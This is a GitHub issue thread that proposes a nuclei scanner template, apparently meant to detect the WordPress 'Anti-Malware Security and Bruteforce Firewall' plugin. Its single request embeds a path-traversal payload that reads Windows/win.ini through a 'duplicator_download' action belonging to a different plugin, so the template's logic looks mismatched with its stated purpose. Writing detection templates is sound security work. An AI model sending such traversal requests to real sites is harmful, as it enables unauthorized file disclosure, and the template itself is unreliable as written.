### ISSUE TITLE
[nuclei-template] wordpress-wp-plugin-gotmls-detect

### ISSUE THREAD

**Issue by vsh00t** [projectdiscovery/nuclei-templates#1888]
**Template Details**

```yaml

id: wordpress-gotmls-detect

info:
  name: Detect WordPress Plugin Anti-Malware Security and Bruteforce Firewall
  author: vsh00t
  reference: https://www.exploit-db.com/exploits/50107
  severity: info

requests:
  - method: GET
    path:
      - "{{BaseURL}}/wp-admin/admin-ajax.php?action=duplicator_download&file=../../../../../../../../../Windows/win.ini"
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "gotmls"
        part: header

      - type: status
        status:
         - 302
    extractors:
      - type: kval
        part: header
        kval:
         - Location

```
